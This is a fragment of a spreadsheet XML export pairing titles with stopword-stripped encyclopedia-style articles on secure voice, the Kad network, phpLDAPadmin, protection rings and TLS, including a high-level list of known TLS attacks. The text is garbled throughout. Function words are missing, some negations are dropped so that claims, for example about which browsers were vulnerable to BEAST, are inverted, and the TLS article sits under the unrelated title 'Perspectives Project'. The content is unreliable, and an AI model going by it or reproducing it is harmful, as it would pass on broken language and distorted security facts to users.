non-key escrow alternative clipper, officially discontinued, still available sourceforge), speakfreely, security voip protocol wrapper zfone developed creator pgp. scrambling, generally using form voice inversion, available electronic hobbyist suppliers common radios. analog scrambling still used, telecommunications circuits, links telephone lines developing world, quality. also microphone blocker mobile phone tracking secure real-time transport protocol (srtp) scip tetra a5/1 zrtp secure voice references external links seminar crypto phones zidu wang</t>
  </si>
  <si>
    <t>Kad network</t>
  </si>
  <si>
    <t>network peer-to-peer (p2p) network implements kademlia overlay protocol. majority users network also connected servers edonkey network, network clients typically query known nodes edonkey network order find initial node network. usage network uses udp-based protocol find sources ed2k hashes. search ed2k hashes based keywords file name. find comments ratings files (hashes). provide buddy services firewalled (low nodes. store locations, comments (keywords filenames.note network used actually transfer files across network. instead, file transfer initiated, clients connect directly (using standard public network). this traffic susceptible blocking/shaping/tracking opportunistic middle-man.as decentralized networks, network requires official common servers. such, cannot disabled shutting given subset nodes. while decentralization network prevents simple shut-down, traffic analysis deep packet inspection readily identify traffic high variable-destination packet throughput. large packet volume typically causes reduction available and/or network resources usually associated traffic. clients client search network supports searching files name number secondary characteristics size, extension, bit-rate, more. features vary based client used. major clients only major clients currently support network implementation. however, comprise user base probably closer ed2k installations. emule: open source windows client popular, network users. also runs linux using wine libraries.there number minor variants, forks, emule support basic features emule itself. they include: amule linux client similar emule) emule mods (not emule plus), possibly others. amule: open source client popular among linux operating systems. currently amule (officially) supports wide variety platforms operating systems. mldonkey: open source, cross-platform client runs many platforms supports numerous file-sharing protocols well. imule: anonymous, open source, cross-platform client. supports network network. edonkey network dropped. lphant: supports also edonkey network bittorrent protocol. network make sure 3.51 version. malware/virus tdl-4: botnet virus reported network backup updates instructions command control servers taken down. also distributed hash table kademlia references external links global view improving lookup performance widely-deployed</t>
  </si>
  <si>
    <t>PhpLDAPadmin</t>
  </si>
  <si>
    <t>phpldapadmin administering lightweight directory access protocol (ldap) servers. it's written programming language, licensed general public license. application available languages supports utf-8 encoded directory strings. history project began fall 2002 dave smith, student brigham young university (byu) lead developer, needed robust application manage ldap servers. originally, phpldapadmin called davedap, august 2003, name changed phpldapadmin. since time, software downloaded approximately times day, commonly used throughout world. developers contributed code base: xavier renard ebel. xavier focused ldif imports/exports samba software integration. focused internationalizing application. spring 2005, deon george took maintenance phpldapadmin.due long period starting 2016, pull requests merged master project, releases made, several forks exist, implement compatibilities functionality. since spring 2019 development going many pull requests merged project restoring compatibility recent releases. distributions following linux distributions include phpldapadmin official software repositories: ubuntu debian gentoo linuxit available extra packages enterprise linux (epel) repository, allowing managed installation distributions enterprise linux, fedora, centos scientific linux, included software distribution system, manages distributes software debian, ubuntu, kubuntu, xubuntu, linux mint, fedora, centos opensuse distributions.it also available repositories freebsd, openbsd, solaris. references external links official website</t>
  </si>
  <si>
    <t>Protection ring</t>
  </si>
  <si>
    <t>computer science, hierarchical protection domains, often called protection rings, mechanisms protect data functionality faults improving fault tolerance) malicious behavior providing computer security). computer operating systems provide different levels access resources. protection ring hierarchical levels layers privilege within architecture computer system. this generally hardware-enforced architectures provide different modes hardware microcode level. rings arranged hierarchy privileged (most trusted, usually numbered zero) least privileged (least trusted, usually highest ring number). ring level privileges allows direct interaction physical hardware certain functionality chips motherboard. special call gates rings provided allow outer ring access inner ring's resources predefined manner, opposed allowing arbitrary usage. correctly gating access rings improve security preventing programs ring privilege level misusing resources intended programs another. example, spyware running user program ring prevented turning camera without informing user, since hardware access ring function reserved device drivers. programs browsers running higher numbered rings must request access network, resource restricted lower numbered ring. implementations multiple rings protection among revolutionary concepts introduced multics operating system, highly secure predecessor today's unix family operating systems. mainframe computer hardware access control, sufficient provide full support rings hardware, multics supported trapping ring transitions software; successor, honeywell 6180, implemented hardware, support eight rings. however, general-purpose systems rings, even hardware provides modes that. example, windows windows server 2008 (and predecessors) rings, ring corresponding kernel mode ring user mode, earlier versions windows processors supported protection levels.many modern architectures (including popular intel architecture) include form ring protection, although windows operating system, like unix, fully utilize feature. os/2 extent, using three rings: ring kernel code device drivers, ring privileged code (user programs access permissions), ring unprivileged code (nearly user programs). under dos, kernel, drivers applications typically ring (however, exclusive case protected-mode drivers and/or extenders used; real-mode system runs effectively protection), whereas memory managers emm386 ring addition this, dr-dos' emm386 3.xx optionally modules (such dpms) ring instead. openvms uses four modes called order decreasing privileges) kernel, executive, supervisor user. renewed interest design structure came proliferation software, ongoing discussion monolithic micro-kernels (particularly usenet newsgroups forums), microsoft's ring-1 design structure part ngscb initiative, hypervisors based virtualization intel vt-x (formerly vanderpool). original multics system eight rings, many modern systems fewer. hardware remains aware current ring executing instruction thread times, help special machine register. systems, areas virtual memory instead assigned ring numbers hardware. example data general eclipse mv/8000, three bits program counter (pc) served ring register. thus code executing virtual 0xe200000, example, would automatically ring calling subroutine different section memory would automatically cause ring transfer. hardware severely restricts ways control passed ring another, also enforces restrictions types memory access performed across rings. using example, special gate structure referenced call instruction transfers control secure towards predefined entry points lower-level (more trusted) rings; functions supervisor call many operating systems ring architecture. hardware restrictions designed limit opportunities accidental malicious breaches security. addition, privileged ring given special capabilities, (such real memory addressing bypasses virtual memory hardware). version architecture implements three privilege levels: application (pl0), operating system (pl1), hypervisor (pl2). unusually, level (pl0) least-privileged level, level most-privileged level. version implements four exception levels: application (el0), operating system (el1), hypervisor (el2), secure monitor firmware (el3), aarch64: d1-2454 aarch32.: g1-6013 ring protection combined processor modes (master/kernel/privileged/supervisor mode versus slave/unprivileged/user mode) systems. operating systems running hardware supporting forms protection one. effective ring architecture requires close cooperation hardware operating system. operating systems designed work multiple hardware platforms make limited rings present every supported platform. often security model simplified "kernel" "user" even hardware provides finer granularity rings. modes supervisor mode computer terms, supervisor mode hardware-mediated flag changed code running system-level software. system-level tasks threads flag running, whereas user-level applications not. this flag determines whether would possible execute machine code operations modifying registers various descriptor tables, performing operations disabling interrupts. idea different modes operate comes "with control comes responsibility" program supervisor mode trusted never fail, since failure cause whole computer system crash. supervisor mode execution mode processors enables execution instructions, including privileged instructions. also give access different address space, memory management hardware peripherals. this mode operating system usually runs."in monolithic kernel, operating system runs supervisor mode applications user mode. other types operating systems, like exokernel microkernel, necessarily share behavior. some examples world: linux, macos windows three operating systems supervisor/user mode. perform specialized functions, user mode code must perform system call supervisor mode even kernel space trusted code operating system perform needed task return execution back userspace. additional code added kernel space loadable kernel modules, user requisite permissions, code subject access control safety limitations user mode. (for long memory manager emm386 loaded), well simple operating systems many embedded devices supervisor mode permanently, meaning drivers written directly user programs.most processors least different modes. x86-processors four different modes divided four different rings. programs ring anything system, code runs ring able fail time without impact rest computer system. ring ring rarely used, could configured different levels access. existing systems, switching user mode kernel mode associated high cost performance. measured, basic request getpid, cost 1000–1500 cycles machines. around actual switch user kernel space, back), rest "kernel overhead". microkernel, minimization overhead reduced overall cost around cycles. maurice wilkes wrote: eventually became clear hierarchical protection rings provided closely match requirements system programmer gave little improvement simple system modes only. rings protection lent efficient implementation hardware, little else said them. [...] attractiveness fine-grained protection remained, even seen rings protection provide answer... this proved blind alley... gain performance determinism, systems place functions would likely viewed application logic, rather device drivers, kernel mode; security applications (access control, firewalls, etc.) operating system monitors cited examples. least embedded database management system, extremedb kernel mode, developed specifically kernel mode deployment, provide local database kernel-based application functions, eliminate context switches would otherwise occur kernel functions interact database system running user mode.functions also sometimes moved across rings direction. linux kernel, instance, injects processes vdso section contains functions would normally require system call, i.e. ring transition. instead syscall functions static data provided kernel. this avoids need ring transition lightweight syscall. function gettimeofday provided way. hypervisor mode recent cpus intel offer virtualization instructions hypervisor control ring hardware access. although mutually incompatible, intel vt-x (codenamed "vanderpool") amd-v (codenamed "pacifica") create "ring guest operating system ring operations natively without affecting guests host assist virtualization, vt-x insert privilege level beneath ring both nine machine code instructions work "ring −1", intended used hypervisor. privilege level privilege level instruction controls access program currently running processor resources memory regions, ports, special instructions. there privilege levels ranging privileged, least privileged. most modern operating systems level kernel/executive, level application programs. resource available level also available levels privilege levels rings. when lesser privileged process tries access higher privileged process, general protection fault exception reported necessary four privilege levels. current operating systems wide market share including microsoft windows, macos, linux, android mostly paging mechanism specify privilege level either supervisor user (u/s bit). windows uses two-level system. real mode programs 8086 executed level (highest privilege level) whereas virtual mode 8086 executes programs level 3.potential future uses multiple privilege levels supported family include containerization virtual machines. host operating system kernel could instructions full privilege access (kernel mode), whereas applications running guest virtual machine container could lowest level privileges user mode. virtual machine guest kernel could intermediate level instruction privilege invoke virtualize kernel-mode operations system calls point view guest operating system. iopl iopl (i/o privilege level) flag flag found ia-32 compatible cpus. occupies bits flags register. protected mode long mode, shows privilege level current program task. current privilege level (cpl) (cpl0, cpl1, cpl2, cpl3) task program must less equal iopl order task program access ports. iopl changed using popf(d) iret(d) current privilege level ring besides iopl, port permissions also take part determining ability task access port. misc systems, hardware virtualization (vt-x svm) referred "ring −1", system management mode referred "ring −2", intel management engine platform security processor sometimes referred "ring −3". hardware features many hardware architectures provide flexibility exploited operating systems normally run. proper complex modes requires close cooperation operating system cpu, thus tends architecture. when specifically designed other, problem (although hardware features still left unexploited), designed compatible multiple, different architectures, large part mode features ignored example, reason windows uses levels (ring ring hardware architectures supported past (such powerpc mips) implemented privilege levels.multics operating system designed specifically special architecture (which turn designed specifically multics), took full advantage modes available however, exception rule. today, high degree interoperation hardware often cost-effective, despite potential advantages security stability. ultimately, purpose distinct operating modes provide hardware protection accidental deliberate corruption system environment (and corresponding breaches system security) software. only "trusted" portions system software allowed execute unrestricted environment kernel mode, then, paradigmatic designs, absolutely necessary. software executes user modes. processor generates fault exception condition user mode, cases system stability unaffected; processor generates fault exception condition kernel mode, operating systems halt system unrecoverable error. when hierarchy modes exists (ring-based security), faults exceptions privilege level destabilize higher-numbered privilege levels. thus, fault ring (the kernel mode highest privilege) crash entire system, fault ring affect rings beyond ring itself, most. transitions modes discretion executing thread transition level high privilege privilege kernel user modes), transitions lower higher levels privilege take place secure, hardware-controlled "gates" traversed executing special instructions external interrupts received. microkernel operating systems attempt minimize amount code running privileged mode, purposes security elegance, ultimately sacrificing performance. also call gate (intel) memory segmentation protected mode available x86-compatible 80286 cpus newer iopl (config.sys directive) os/2 directive code ring instead ring segment descriptor supervisor call instruction system management mode (smm) principle least privilege references intel 80386 programmer's reference further reading</t>
  </si>
  <si>
    <t>Perspectives Project</t>
  </si>
  <si>
    <t>transport layer security (tls) cryptographic protocol designed provide communications security computer network. protocol widely used applications email, instant messaging, voice securing https remains publicly visible. protocol aims primarily provide cryptography, including privacy (confidentiality), integrity, authenticity certificates, communicating computer applications. runs application layer composed layers: record handshake protocols. proposed internet engineering task force (ietf) standard, first defined 1999, current version 1.3, defined august 2018. builds now-deprecated (secure sockets layer) specifications (1994, 1995, 1996) developed netscape communications adding https protocol navigator browser. description client-server applications protocol communicate across network designed prevent eavesdropping tampering. since applications communicate either without ssl), necessary client request server connection. main ways achieving different port number connections. example, port typically used unencrypted http traffic port common port used encrypted https traffic. another mechanism client make protocol-specific request server switch connection tls; example, making starttls request using mail news protocols. once client server agreed tls, negotiate stateful connection using handshaking procedure. protocols handshake asymmetric cipher establish cipher settings also session-specific shared communication encrypted using symmetric cipher. during handshake, client server agree various parameters used establish connection's security: handshake begins client connects tls-enabled server requesting secure connection client presents list supported cipher suites (ciphers hash functions). from list, server picks cipher hash function also supports notifies client decision. server usually provides identification form digital certificate. certificate contains server name, trusted certificate authority (ca) vouches authenticity certificate, server's public encryption key. client confirms validity certificate proceeding. generate session keys used secure connection, client either: encrypts random number (premastersecret) server's public sends result server (which server able decrypt private key); parties random number generate unique session subsequent encryption decryption data session, uses diffie–hellman exchange securely generate random unique session encryption decryption additional property forward secrecy: server's private disclosed future, cannot used decrypt current session, even session intercepted recorded third party.this concludes handshake begins secured connection, encrypted decrypted session connection closes. steps fails, handshake fails connection created. neatly single layer model tcp/ip model. runs reliable transport protocol (e.g., tcp)," would imply transport layer. serves encryption higher layers, normally function presentation layer. however, applications generally transport layer, even though applications using must actively control initiating handshakes handling exchanged authentication certificates.when secured tls, connections client (e.g., browser) server (e.g., wikipedia.org) following properties: connection private secure) symmetric-key algorithm used encrypt data transmitted. keys symmetric encryption generated uniquely connection based shared secret negotiated start session. server client negotiate details encryption algorithm cryptographic keys first byte data transmitted (see below). negotiation shared secret secure (the negotiated secret unavailable eavesdroppers cannot obtained, even attacker places themself middle connection) reliable attacker modify communications negotiation without detected). identity communicating parties authenticated using public-key cryptography. this authentication required server optional client. connection reliable message transmitted includes message integrity check using message authentication code prevent undetected loss alteration data transmission.: addition above, careful configuration provide additional privacy-related properties forward secrecy, ensuring future disclosure encryption keys cannot used decrypt communications recorded past. supports many different methods exchanging keys, encrypting data, authenticating message integrity. result, secure configuration involves many configurable parameters, choices provide privacy-related properties described list (see tables exchange, cipher security, data integrity). attempts made subvert aspects communications security seeks provide, protocol revised several times address security threats. developers browsers repeatedly revised products defend potential security weaknesses discovered (see tls/ssl support history browsers). history development secure data network system transport layer security protocol (tls), together several basic network security platforms, developed joint initiative begun august 1986, among national security agency, national bureau standards, defense communications agency, twelve communications computer corporations initiated special project called secure data network system (sdns). program described september 1987 10th national computer security conference extensive published papers. innovative research program focused designing next generation secure computer communications network product specifications implemented applications public private internets. intended complement rapidly emerging internet standards moving forward u.s. government's gosip profiles huge itu-iso jtc1 internet effort internationally. originally known protocol, renamed subsequently published 1995 international standard itu-t x.274|iso/iec 10736:1995. secure network programming early research efforts towards transport layer security included secure network programming (snp) application programming interface (api), 1993 explored approach secure transport layer closely resembling berkeley sockets, facilitate retrofitting pre-existing network applications security measures. 1.0, 2.0, netscape developed original protocols, taher elgamal, chief scientist netscape communications 1995 1998, described "father ssl". version never publicly released serious security flaws protocol. version 2.0, released february 1995 quickly discovered contain number security usability flaws. used cryptographic keys message authentication encryption. weak construction used hash function secret prefix, making vulnerable length extension attacks. provided protection either opening handshake explicit message close, meant man-in-the-middle attacks could undetected. moreover, assumed single service fixed domain certificate, conflicting widely used feature virtual hosting servers, websites effectively impaired using ssl. these flaws necessitated complete redesign protocol version 3.0. released 1996, produced paul kocher working netscape engineers phil karlton alan freier, reference implementation christopher allen dierks consensus development. newer versions ssl/tls based 3.0. 1996 draft published ietf historical document 6101. deprecated 2011 6176. 2014, found vulnerable poodle attack affects block ciphers ssl; rc4, non-block cipher supported 3.0, also feasibly broken used 3.0. deprecated june 2015 7568. first defined 2246 january 1999 upgrade version 3.0, written christopher allen dierks consensus development. stated rfc, "the differences protocol dramatic, significant enough preclude interoperability 3.0". dierks later wrote changes, renaming "ssl" "tls", face-saving gesture microsoft, look [like] ietf rubberstamping netscape's protocol".the council suggested organizations migrate higher june 2018. october 2018, apple, google, microsoft, mozilla jointly announced would deprecate march 2020. defined 4346 april 2006. update version 1.0. significant differences version include: added protection cipher-block chaining (cbc) attacks. implicit initialization vector (iv) replaced explicit change handling padding errors. support iana registration parameters.: support versions widely deprecated sites around 2020, disabling access firefox versions chromium-based browsers defined 5246 august 2008. based earlier specification. major differences include: md5–sha-1 combination pseudorandom function (prf) replaced sha-256, option cipher suite specified prfs. md5–sha-1 combination finished message hash replaced sha-256, option cipher suite specific hash algorithms. however, size hash finished message must still least bits. md5–sha-1 combination digitally signed element replaced single hash negotiated handshake, defaults sha-1. enhancement client's server's ability specify hashes signature algorithms accept. expansion support authenticated encryption ciphers, used mainly galois/counter mode (gcm) mode advanced encryption standard (aes) encryption. extensions definition cipher suites added.: versions refined 6176 march 2011, removing backward compatibility sessions never negotiate secure sockets layer (ssl) version 2.0. defined 8446 august 2018. based earlier specification. major differences include: separating agreement authentication algorithms cipher suites removing support weak less-used named elliptic curves removing support sha-224 cryptographic hash functions requiring digital signatures even previous configuration used integrating hkdf semi-ephemeral proposal replacing resumption tickets supporting 1-rtt handshakes initial support 0-rtt mandating perfect forward secrecy, means using ephemeral keys (ec)dh agreement dropping support many insecure obsolete features including compression, renegotiation, non-aead ciphers, non-pfs exchange (among static static exchanges), custom groups, point format negotiation, change cipher spec protocol, hello message unix time, length field input aead ciphers prohibiting negotiation backwards compatibility integrating session hash deprecating record layer version number freezing number improved backwards compatibility moving security-related algorithm details appendix specification relegating clientkeyshare appendix adding chacha20 stream cipher poly1305 message authentication code adding ed25519 ed448 digital signature algorithms adding x25519 x448 exchange protocols adding support sending multiple ocsp responses encrypting handshake messages serverhellonetwork security services (nss), cryptography library developed mozilla used browser firefox, enabled default february 2017. support subsequently added compatibility issues small number users, automatically enabled firefox 52.0, released march 2017. enabled default 2018 release firefox 60.0.google chrome default version short time 2017. removed default, incompatible middleboxes blue coat proxies.during ietf hackathon, took place singapore 2017, group worked adapting open-source applications 1.3. group made individuals japan, united kingdom, mauritius cyberstorm.mu team. this work continued ietf hackathon london, ietf hackathon montreal.wolfssl enabled version 3.11.1, released 2017. first commercial implementation, wolfssl 3.11.1 supported draft supports draft final version, well many older versions. series blogs published performance difference 1.3.in september 2018, popular openssl project released version 1.1.1 library, support "the headline feature".support first added schannel windows windows server 2022. enterprise transport security electronic frontier foundation praised expressed concern variant protocol enterprise transport security (ets) intentionally disables important security measures 1.3. originally called enterprise (etls), published standard known 'etsi ts103523-3', "middlebox security protocol, part3: enterprise transport security". intended entirely within proprietary networks banking systems. support forward secrecy allow third-party organizations connected proprietary networks able private monitor network traffic detection malware make easier conduct audits. despite claimed benefits, warned loss forward secrecy could make easier data exposed along saying better ways analyze traffic. digital certificates digital certificate certifies ownership public named subject certificate, indicates certain expected usages key. this allows others (relying parties) rely upon signatures assertions made private corresponds certified public key. keystores trust stores various formats, .pem, .crt, .pfx, .jks. certificate authorities typically relies trusted third-party certificate authorities establish authenticity certificates. trust usually anchored list certificates distributed user agent software, modified relying party. according netcraft, monitors active certificates, market-leading certificate authority (ca) symantec since beginning survey verisign authentication services business unit purchased symantec). 2015, symantec accounted third certificates valid certificates used million busiest websites, counted netcraft. 2017, symantec sold tls/ssl business digicert. updated report, shown identrust, digicert, sectigo certificate authorities terms market share since 2019.as consequence choosing x.509 certificates, certificate authorities public infrastructure necessary verify relation certificate owner, well generate, sign, administer validity certificates. while convenient verifying identities trust, 2013 mass surveillance disclosures made widely known certificate authorities weak point security standpoint, allowing man-in-the-middle attacks (mitm) certificate authority cooperates compromised). algorithms exchange agreement before client server begin exchange information protected tls, must securely exchange agree upon encryption cipher encrypting data (see cipher). among methods used exchange/agreement are: public private keys generated (denoted tls_rsa handshake protocol), diffie–hellman (tls_dh), ephemeral diffie–hellman (tls_dhe), elliptic-curve diffie–hellman (tls_ecdh), ephemeral elliptic-curve diffie–hellman (tls_ecdhe), anonymous diffie–hellman (tls_dh_anon), pre-shared (tls_psk) secure remote password (tls_srp).the tls_dh_anon tls_ecdh_anon agreement methods authenticate server user hence rarely used vulnerable man-in-the-middle attacks. only tls_dhe tls_ecdhe provide forward secrecy. public certificates used exchange/agreement also vary size public/private encryption keys used exchange hence robustness security provided. july 2013, google announced would longer 1024-bit public keys would switch instead 2048-bit keys increase security encryption provides users encryption strength directly related size. cipher notes data integrity message authentication code (mac) used data integrity. hmac used mode block ciphers. authenticated encryption (aead) mode uses aead-integrated hmac. hmac-based prf, hkdf used handshake. applications adoption applications design, usually implemented transport layer protocols, encrypting protocol-related data protocols http, ftp, smtp, nntp xmpp. historically, used primarily reliable transport protocols transmission control protocol (tcp). however, also implemented datagram-oriented transport protocols, user datagram protocol (udp) datagram congestion control protocol (dccp), usage standardized independently using term datagram transport layer security (dtls). websites primary secure world wide traffic website browser encoded http protocol. this secure http traffic constitutes https protocol. notes browsers april 2016, latest versions major browsers support 1.0, 1.1, 1.2, enabled default. however, supported microsoft operating systems support latest version additionally, many microsoft operating systems currently support multiple versions changed according microsoft's internet explorer support lifecycle policy faq, "beginning january 2016, current version internet explorer available supported operating system receive technical support security updates." page goes list latest supported version date operating system. next critical date would operating system reaches life stage. since june 2022, internet explorer dropped support windows editions follow microsoft's modern lifecycle policy.mitigations known attacks enough yet: mitigations poodle attack: browsers already prevent fallback 3.0; however, mitigation needs supported clients also servers. disabling itself, implementation "anti-poodle record splitting", denying ciphers required. google chrome: complete (tls_fallback_scsv implemented since version fallback disabled since version disabled default since version support dropped since version 44.) mozilla firefox: complete (support dropped since version disabled default fallback disabled since version tls_fallback_scsv implemented since version esr, disabled default tls_fallback_scsv implemented since 31.3.0.) internet explorer: partial (only version disabled default since april 2015. version older still vulnerable poodle.) opera: complete (tls_fallback_scsv implemented since version "anti-poodle record splitting", effective client-side implementation, implemented since version disabled default since version support dropped since version 31.) safari: complete (only 10.8 later ciphers fallback denied, means rc4, recommended well. support dropped 10.11 later mitigation attacks: google chrome disabled except fallback since version disabled since chrome firefox disabled except fallback since version firefox disabled default. opera disabled except fallback since version disabled since opera internet explorer windows 7/server 2008 windows 8/server 2012 priority lowest also disable except fallback registry settings. internet explorer mobile windows phone disable except fallback enabled algorithm works. edge disable completely august 2016. mitigation freak attack: android browser included android older still vulnerable freak attack. internet explorer mobile still vulnerable freak attack. google chrome, internet explorer (desktop), safari (desktop mobile), opera (mobile) freak mitigations place. mozilla firefox platforms google chrome windows affected freak. notes libraries most programming libraries free open source software. boringssl, fork openssl chrome/chromium android well google applications. botan, bsd-licensed cryptographic library written c++. bsafe micro edition suite: multi-platform implementation written using fips-validated cryptographic module bsafe ssl-j: library providing proprietary jsse api, using fips-validated cryptographic module cryptlib: portable open source cryptography library (includes tls/ssl implementation) delphi programmers library called indy utilizes openssl alternatively supports now. gnutls: free implementation (lgpl licensed) java secure socket extension (jsse): java provider implementation (named sunjsse) libressl: fork openssl openbsd project. matrixssl: dual licensed implementation mbed (previously polarssl): tiny library implementation embedded devices designed ease network security services: fips validated open source library openssl: free implementation (bsd license extensions) schannel: implementation microsoft windows part package. secure transport: implementation used part packages. wolfssl (previously cyassl): embedded ssl/tls library strong focus speed size. paper presented 2012 conference computer communications security showed applications used libraries correctly, leading vulnerabilities. according authors: "the root cause vulnerabilities terrible design apis underlying libraries. instead expressing high-level security properties network tunnels confidentiality authentication, apis expose low-level details protocol application developers. consequence, developers often apis incorrectly, misinterpreting misunderstanding manifold parameters, options, side effects, return values." other uses simple mail transfer protocol (smtp) also protected tls. these applications public certificates verify identity endpoints. also used tunnelling entire network stack create vpn, case openvpn openconnect. many vendors married tls's encryption authentication capabilities authorization. there also substantial development since late 1990s creating client technology outside web-browsers, order enable support client/server applications. compared traditional ipsec technologies, inherent advantages firewall traversal make easier administer large remote-access populations. also standard method protecting session initiation protocol (sip) application signaling. used providing authentication encryption signalling associated voip sip-based applications. security attacks tls/ssl significant attacks tls/ssl listed below. february 2015, ietf issued informational summarizing various known attacks tls/ssl. renegotiation attack vulnerability renegotiation procedure discovered august 2009 lead plaintext injection attacks current versions tls. example, allows attacker hijack https connection splice requests beginning conversation client server. attacker can't actually decrypt client–server communication, different typical man-in-the-middle attack. short-term servers stop allowing renegotiation, typically require changes unless client certificate authentication used. vulnerability, renegotiation indication extension proposed tls. require client server include verify information previous handshakes renegotiation handshakes. this extension become proposed standard assigned number 5746. implemented several libraries. downgrade attacks: freak attack logjam attack protocol downgrade attack (also called version rollback attack) tricks server negotiating connections previous versions (such sslv2) long since abandoned insecure. previous modifications original protocols, like false start (adopted enabled google chrome) snap start, reportedly introduced limited protocol downgrade attacks allowed modifications cipher suite list sent client server. attacker might succeed influencing cipher suite selection attempt downgrade cipher suite negotiated either weaker symmetric encryption algorithm weaker exchange. paper presented conference computer communications security 2012 demonstrated false start extension risk: certain circumstances could allow attacker recover encryption keys offline access encrypted data.encryption downgrade attacks force servers clients negotiate connection using cryptographically weak keys. 2014, man-in-the-middle attack called freak discovered affecting openssl stack, default android browser, safari browsers. attack involved tricking servers negotiating connection using cryptographically weak encryption keys. logjam security exploit discovered 2015 exploits option using legacy "export-grade" 512-bit diffie–hellman groups dating back 1990s. forces susceptible servers downgrade cryptographically weak 512-bit diffie–hellman groups. attacker deduce keys client server determine using diffie–hellman exchange. cross-protocol attacks: drown drown attack exploit attacks servers supporting contemporary ssl/tls protocol suites exploiting support obsolete, insecure, sslv2 protocol leverage attack connections using up-to-date protocols would otherwise secure. drown exploits vulnerability protocols used configuration server, rather specific implementation error. full details drown announced march 2016, together patch exploit. time, 81,000 million popular websites among protected websites vulnerable drown attack. beast attack september 2011 researchers thai duong juliano rizzo demonstrated proof concept called beast (browser exploit against ssl/tls) using java applet violate origin policy constraints, long-known cipher block chaining (cbc) vulnerability 1.0: attacker observing consecutive ciphertext blocks test plaintext block equal choosing next plaintext block {\displaystyle \oplus {\displaystyle \oplus operation, e(c1 {\displaystyle \oplus e(c1 {\displaystyle \oplus {\displaystyle \oplus {\displaystyle \oplus e(c0 {\displaystyle \oplus equal practical exploits previously demonstrated vulnerability, originally discovered phillip rogaway 2002. vulnerability attack fixed 2006, seen wide adoption prior attack demonstration. stream cipher immune beast attack. therefore, widely used mitigate beast attack server side. however, 2013, researchers found weaknesses rc4. thereafter enabling server side longer recommended.chrome firefox vulnerable beast attack, however, mozilla updated libraries mitigate beast-like attacks. used mozilla firefox google chrome implement ssl. some servers broken implementation specification stop working result.microsoft released security bulletin ms12-006 january 2012, fixed beast vulnerability changing windows secure channel (schannel) component transmits encrypted network packets server end. users internet explorer (prior version older versions windows (windows windows windows server 2008 restrict higher. apple fixed beast vulnerability implementing 1/n-1 split turning default mavericks, released october 2013. crime breach attacks authors beast attack also creators later crime attack, allow attacker recover content cookies data compression used along tls. when used recover content secret authentication cookies, allows attacker perform session hijacking authenticated session. while crime attack presented general attack could work effectively large number protocols, including limited tls, application-layer protocols spdy http, exploits spdy demonstrated largely mitigated browsers servers. crime exploit http compression mitigated all, even though authors crime warned vulnerability might even widespread spdy compression combined. 2013 instance crime attack http compression, dubbed breach, announced. based crime attack breach attack extract login tokens, email addresses sensitive information encrypted traffic little seconds (depending number bytes extracted), provided attacker tricks victim visiting malicious link able inject content valid pages user visiting (ex: wireless network control attacker). versions risk breach regardless encryption algorithm cipher used. unlike previous instances crime, successfully defended turning compression spdy header compression, breach exploits http compression cannot realistically turned off, virtually servers rely upon improve data transmission speeds users. this known limitation susceptible chosen-plaintext attack application-layer data meant protect. timing attacks padding earlier versions vulnerable padding oracle attack discovered 2002. novel variant, called lucky thirteen attack, published 2013. some experts also recommended avoiding triple cbc. since last supported ciphers developed support program using windows xp's ssl/tls library like internet explorer windows triple-des, since deprecated (see discussion attacks), makes difficult support version program using library released encrypt-then-mac extension specification, released 7366. lucky thirteen attack mitigated using aes_gcm ciphers; aes_cbc remains vulnerable. poodle attack october 2014, google researchers published vulnerability design 3.0, makes mode operation vulnerable padding attack (cve-2014-3566). they named attack poodle (padding oracle downgraded legacy encryption). average, attackers need make requests reveal byte encrypted messages.although vulnerability exists clients servers support above, major browsers voluntarily downgrade handshakes newer versions fail unless provide option user administrator disable user administrator therefore, man-in-the-middle first conduct version rollback attack exploit vulnerability.on december 2014, variant poodle announced impacts implementations properly enforce padding byte requirements. attacks despite existence attacks broke security, cipher suites based still considered secure prior 2013 based used tls. 2011, suite actually recommended work around beast attack. forms attack disclosed march 2013 conclusively demonstrated feasibility breaking tls, suggesting good workaround beast. attack scenario proposed alfardan, bernstein, paterson, poettering schuldt used newly discovered statistical biases table recover parts plaintext large number encryptions. attack requires encryptions break unveiled july 2013 later described "feasible" accompanying presentation usenix security symposium august 2013. july 2015, subsequent improvements attack make increasingly practical defeat security rc4-encrypted tls.as many modern browsers designed defeat beast attacks (except safari 10.7 earlier, earlier, windows; browsers), longer good choice 1.0. ciphers affected beast attack past become popular choice protection. mozilla microsoft recommend disabling possible. 7465 prohibits cipher suites versions tls. september 2015, microsoft, google mozilla announced cipher suites would disabled default browsers (microsoft edge, internet explorer windows 7/8.1/10, firefox, chrome) early 2016. truncation attack (logout) truncation attack blocks victim's account logout requests user unknowingly remains logged service. when request sign sent, attacker injects unencrypted message data sender) close connection. server therefore receive logout request unaware abnormal termination.published july 2013, attack causes services gmail hotmail display page informs user successfully signed-out, ensuring user's browser maintains authorization service, allowing attacker subsequent access browser access take control user's logged-in account. attack rely installing malware victim's computer; attackers need place victim server (e.g., setting rogue wireless hotspot). this vulnerability also requires access victim's computer. another possibility using data connection false data stream, protocol rules exchanging close_notify alerts adhered file truncated. unholy attack this attack, discovered mid-2016, exploits weaknesses proxy autodiscovery protocol (wpad) expose user attempting reach tls-enabled link. disclosure violate user's privacy, website accessed, also urls sometimes used authenticate users. document sharing services, offered google dropbox, also work sending user security token that's included url. attacker obtains urls able gain full access victim's account data. exploit works almost browsers operating systems. sweet32 attack sweet32 attack breaks 64-bit block ciphers used mode used exploiting birthday attack either man-in-the-middle attack injection malicious javascript page. purpose man-in-the-middle attack javascript injection allow attacker capture enough traffic mount birthday attack. implementation errors: heartbleed bug, berserk attack, cloudflare heartbleed serious vulnerability specific implementation ssl/tls popular openssl cryptographic software library, affecting versions 1.0.1 1.0.1f. this weakness, reported april 2014, allows attackers steal private keys servers normally protected. heartbleed allows anyone internet read memory systems protected vulnerable versions openssl software. this compromises secret private keys associated public certificates used identify service providers encrypt traffic, names passwords users actual content. this allows attackers eavesdrop communications, steal data directly services users impersonate services users. vulnerability caused buffer over-read openssl software, rather defect protocol specification. september 2014, variant daniel bleichenbacher's pkcs#1 v1.5 signature forgery vulnerability announced intel security advanced threat research. this attack, dubbed berserk, result incomplete asn.1 length decoding public signatures implementations, allows man-in-the-middle attack forging public signature.in february 2015, media reported hidden pre-installation superfish adware lenovo notebooks, researcher found trusted root certificate affected lenovo machines insecure, keys could easily accessed using company name, komodia, passphrase. komodia library designed intercept client-side tls/ssl traffic parental control surveillance, also used numerous adware programs, including superfish, often surreptitiously installed unbeknownst computer user. turn, potentially unwanted programs installed corrupt root certificate, allowing attackers completely control traffic confirm false websites authentic. 2016, reported dozens danish https-protected websites belonging visa inc. vulnerable attacks allowing 